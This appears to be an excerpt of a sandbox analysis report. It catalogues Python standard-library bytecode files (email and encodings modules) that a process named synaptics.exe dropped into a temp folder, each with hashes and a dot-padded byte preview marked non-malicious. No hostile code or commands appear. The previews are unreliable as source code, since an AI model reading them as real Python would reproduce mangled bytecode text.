                                                                                                                                                                                                                Preview:o........{-d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r...../C:\Users\user\Desktop\tmp\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an appropriate Content-Transfer-Encoding hea
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5712
                                                                                                                                                                                                                Entropy (8bit):4.730832987212451
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:8YI+E7YT1Z4Q6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:8YTEOCQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                                                MD5:626EAF5C602C5BD8D728366752959462
                                                                                                                                                                                                                SHA1:DDAB47C7F1E97A2A22CA03E517834AD0910B6841
                                                                                                                                                                                                                SHA-256:0B814D6D4513534704EC892C6165AADE904C77E7E91370EC669FB210FA818C11
                                                                                                                                                                                                                SHA-512:D4317B52B6914B829A473264F7ED1592F46C8A75BE38C7EA7594DD4AFCC876A29F628D2A61289AE1E897DC11906230F5A742EA187C72362FDEE933A9303C1522
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r.....-C:\Users\user\Desktop\tmp\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing headers.Nr....r....r....r....r....r........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10588
                                                                                                                                                                                                                Entropy (8bit):5.444436812541746
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:IQt3lEm80KYgjRm95weZd6S3DFKTbefqH0P302hjD8gYo5:jtVEx0KYr5weZJ3DFSbei+029D8Zo5
                                                                                                                                                                                                                MD5:2EB301CDD07BA8EEE956C882C5ED85B5
                                                                                                                                                                                                                SHA1:D5C47A9D353D1D895B2A5EDB0DDAC0CB27339320
                                                                                                                                                                                                                SHA-256:EA89EEBFD5E6FB3CB3A71ACEF6A0AD70FDA2082543B38220C08A758EDB3E03FB
                                                                                                                                                                                                                SHA-512:D7ED29E1C3F4485CD81030A9474A75CD5B6B6E58373B199D24493D0F4F27864CCB99A1C85E7AB7D841C1FE77E6A5B80B7717F9CB98064553A11509B9001050B2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16472
                                                                                                                                                                                                                Entropy (8bit):5.349356081838418
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ZEojVdryA8pfSNW44RPb/bliTC72UjV9LFqSevFmHj0HP8HMJ25cPh:ZEQ/85S844NbMGvcPh
                                                                                                                                                                                                                MD5:A04EEF90A83943FE3B29E42793D1886E
                                                                                                                                                                                                                SHA1:CB5235714509A94152354D1F321836D11FD25B44
                                                                                                                                                                                                                SHA-256:E288EB9C06EF529ECAB22EE4E5C9D0A932FE420EC672B2422E97E8C2AEA5C9FB
                                                                                                                                                                                                                SHA-512:FECBCB3FAB9DDD733628B2B6C067E54BD09A46FD431F22B38A29A03399DFC2FE30DA2E4B5EE9038E66BCA60D92064FAA887F7E7A0219F703AB9F42DA086DF4F3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1978
                                                                                                                                                                                                                Entropy (8bit):5.3228602222584245
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:yhA49ILWjxKOzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:yrIWdZ5UFsMbhOQGTEl9
                                                                                                                                                                                                                MD5:9433AC9188904FB62875D949E337522D
                                                                                                                                                                                                                SHA1:F38B02E18C6FA325F4A9F9210DF86BE917CA0362
                                                                                                                                                                                                                SHA-256:18747B05B88953A41644016409714C740239F1B83E08B881BCFE286E8A23BED3
                                                                                                                                                                                                                SHA-512:A509235748BCCD1CD4CB081EF482B59C093830D7A0272007E23AD9A5CC583FC395DEE3F108BF08CFF27E1F95CA73735F1D5AF3D21DCE4608562B8002FACBC806
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....0C:\Users\user\Desktop\tmp\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r......textc....................c...s:.....|.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):37814
                                                                                                                                                                                                                Entropy (8bit):5.295163318637581
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:73vKre029TBAXUyI2UBNqLYn1cT93o29AevROi/GTs:bvN029TSUr26N+OaT9YmAWSs
                                                                                                                                                                                                                MD5:F388EC69F06375AE5B253FC8205B9839
                                                                                                                                                                                                                SHA1:71A2C1C8F99A04D5E28D80870154F751AC99EDD6
                                                                                                                                                                                                                SHA-256:658E9270DB8C90803980A23A699EF8A13574B00EF1549D4681E9D10C43C95557
                                                                                                                                                                                                                SHA-512:F9EC2B3C2399BFC07E3C676FCE4CBAB5A4073CA184D21EB900A496F121431DCD2049DB0AFE03B212B99F995D16FBB45C31DA7AD58050D566932C471A346AE654
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r......C:\Users\user\Desktop\tmp\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and return a key=value pair... This will quot
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5683
                                                                                                                                                                                                                Entropy (8bit):4.915891677882916
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:x/3XAtc7ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:Vgtc7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                                                MD5:58A1A358D09CBEF7F5A6DE6D6F9FE94F
                                                                                                                                                                                                                SHA1:95CC523EFF7A22F5CC1D974055408D5029DFD84F
                                                                                                                                                                                                                SHA-256:98C7F8B46D92F1D6E65D7758BEA72F89D356D3B8E07BE9A4042C2486634FA193
                                                                                                                                                                                                                SHA-512:9D8E184C7DD7A4EE660BAC94BB3FF06306025EA16C1966CBF9283F3C4F532675F7ACEA914FD6A2D7521284242138F4D9D23AB5CAAD274FF3532213F99CF53BA7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7633
                                                                                                                                                                                                                Entropy (8bit):5.503310949843634
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:SLJLyjCY2rlgeRk/SEq4iIf3HOxK4RVZtpes7tOcQekFUyq2n1/ugYu9eYBAd7z4:eJYUGQ2SEn27RlpsyyFhugYQeYBk8B9
                                                                                                                                                                                                                MD5:39505C42AECE7E863ACF61B3A9B43CA2
                                                                                                                                                                                                                SHA1:30B51B58A2370EFB41DE7336C7C0662FBE17078E
                                                                                                                                                                                                                SHA-256:5B79E4519A0712D35EC2CB839060A9CA2794AC671DB027A2ACF3476294C1DA3D
                                                                                                                                                                                                                SHA-512:C6C757F564B1C54F0C176A6CFE8A160B4092D4B691210ABF716EDDB199B947E86FA8484987334326804E154457A90CD9B5EDDA0B1A39298B25149DB2F0235495
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9696
                                                                                                                                                                                                                Entropy (8bit):5.523212904026857
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:+bd4hopYU1b0vS5Tc8PNMw1TBrUEPUcXDu4cGGZscLPtCSStw3TG/3W4b/o:upyv+FSwNBrUmbXDu4QRPzGyGn/o
                                                                                                                                                                                                                MD5:CA5C50CCDE703FC0CAEB244112518581
                                                                                                                                                                                                                SHA1:922C39CA61A1B75A7DE04E8551BC0A1698D02DFD
                                                                                                                                                                                                                SHA-256:8FC4CEBE24F54EA97BEE6CFDC44D4D35B9E6E40E12731807623990C754496BEB
                                                                                                                                                                                                                SHA-512:6EB1DD3543D6E11A59B05C2D5AD09AFAED28C415094134DB9B3F7186DA3668CFE3932FD8F32DD1E54AC1313BE4F4FF8AFF87E1673CEB225D5707AE1A6C7011D7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.5.......................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.e...d...Z.e...d...Z.d.d...Z.d.d...Z.d5d.d...Z.d.d...Z.d.d...Z d6d.d...Z!d7d.d...Z"d8d.d ..Z#d!d"..Z$d#d$..Z%d%d&..Z&d'd(..Z'd8d)d*..Z(e...d+e.j)..Z*d,d-..Z+.../d9d0d1..Z,d:d3d4..Z-d.S.);z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c....................C...s$...z.|.......W.d.S...t.y.......Y.d.S.w.).z8Return True if s contains surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s..r.....,C:\Users\user\Desktop\tmp\lib\email\utils.py.._has_surrogates3...s................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3885
                                                                                                                                                                                                                Entropy (8bit):5.524262788207071
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:MXLHIYGspF3e06Q0YhQLUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:MXEYLpFkY2U7XYLf5c6+X1Y
                                                                                                                                                                                                                MD5:FCDA77DFE512009B8D8AD9CDE41F8A67
                                                                                                                                                                                                                SHA1:424076830266BB8D697E548A785E42B918A40FB9
                                                                                                                                                                                                                SHA-256:5589E7A3CAAA59D40C6A07041D10F54F2EC2558390858BD7CB67DD2C18725291
                                                                                                                                                                                                                SHA-512:7BB82A8654BB07BE7472159C0B771ED849D8F661E735EA0233A75474F2AD98201A142BEEED50481A24DEBA72E914014537B2146A2EC8763A55D1217183B7C447
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10931
                                                                                                                                                                                                                Entropy (8bit):5.8411032649898615
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:UX2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1iPzxOkq4bpehh3qkyR0N:UXG0bueBI6dzx9IX6Ri
                                                                                                                                                                                                                MD5:7C587610D263481416BFDA054A2FD106
                                                                                                                                                                                                                SHA1:E376C927994F63B2C23953E0A50DDB68D7722499
                                                                                                                                                                                                                SHA-256:0891947219A1E2429EE45BB47271306961A27964094570D283D917D18C157325
                                                                                                                                                                                                                SHA-512:FA5A68968AA894AA5C5C313B8ABC031A148E09BD0805ED3A015E4D2756C6703C992935FD7A36362B93869943699BC67378321FBD576B597999F107D2F484F4A4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2387
                                                                                                                                                                                                                Entropy (8bit):5.427051068107574
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:NHYqr1EMGxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:NHY0EMWtZjr+Jldf33Pf396nz
                                                                                                                                                                                                                MD5:1970C795A0F8A0502A6346A4B47D4DE0
                                                                                                                                                                                                                SHA1:51854F12D13B3EDFED58C788C0EF67C3834F53BA
                                                                                                                                                                                                                SHA-256:39DE01364D797CA84667D99AD843703F6918277BABC2624247A7632013454830
                                                                                                                                                                                                                SHA-512:41349E16A44D930A471533A7A9CBA8B6CC946908EFF0F277CFEBAF7D9DF10FBACF905570E3B16EBF8AC1AF31BD41DA8065BE418B789CFC29B463751228F7CD07
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....1C:\Users\user\Desktop\tmp\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r......finalr....r....r.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5609
                                                                                                                                                                                                                Entropy (8bit):5.226206035521818
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:eD5ooZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:u2oZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                                                MD5:A3A2132FFD914BA67503030546E59E3D
                                                                                                                                                                                                                SHA1:72154ADD1786256FC81B9863CFFC5E9FCC594F68
                                                                                                                                                                                                                SHA-256:5E4310074D2B443D6B6DBDCF66C0A68462ADDB6113488B998F657DAC00CFD72F
                                                                                                                                                                                                                SHA-512:A636592CE6605C4CE52C798E950AF928D2C0DA6CDC38C8F0BDCDB9ECE282E1CF303125F0FE7030AF04FD7A938B09DA0BE0B7FBB5B31C2A206A2257CC9E073BC4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r...../C:\Users\user\Desktop\tmp\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r.........z.Vio
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1607
                                                                                                                                                                                                                Entropy (8bit):4.703741635730056
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:9Vtus1piprHUrYPyaGcLXaLOsJkLBBn1U:9buWwHUPNcLXaasmP1U
                                                                                                                                                                                                                MD5:A1DD347CA5E9DC6FB987B34840E7B818
                                                                                                                                                                                                                SHA1:1DCDF9F3DD8B3FEF0C91B324A9493E32050229D4
                                                                                                                                                                                                                SHA-256:F252E16172D43DD878DDCF9F42370C4994F03390884E241D1C3867E3810C5D62
                                                                                                                                                                                                                SHA-512:83453A972AD28389C665497EA48C00B964EDBF4366F419E327082B49BF0E2E03A23EDA3D9E74C75064746728EB3CA2113F4AE5A16BA739A84CA51A1C2126C428
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....0C:\Users\user\Desktop\tmp\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c....................@...r....)...Stream
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6426
                                                                                                                                                                                                                Entropy (8bit):5.8016181568164
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:7WZsdAA4kaBaNzpZOZBDcxHN/8O2OHb4k7:7RzpZOZBDcpNp2iT
                                                                                                                                                                                                                MD5:8992DBF4F6ECB516ECB0AD501EE1D26F
                                                                                                                                                                                                                SHA1:4E0F50451672CF74D7EB72C3F0B9CBD8BBFE4909
                                                                                                                                                                                                                SHA-256:00391EF7EA892708AA8010A275328A938E7A89CB41A5164EF0D6E1652A3EF58B
                                                                                                                                                                                                                SHA-512:09EF45B9E34888B22BF2BBE80621E4AD6ECE3929DEB9C4BF53E710DCEE7A8E245385C0EE1DFB7B87C0832FC838BEDDAEC79921DCD30C649682B9DE6C10F689DA
                                                                                                                                                                                                                Malicious:false
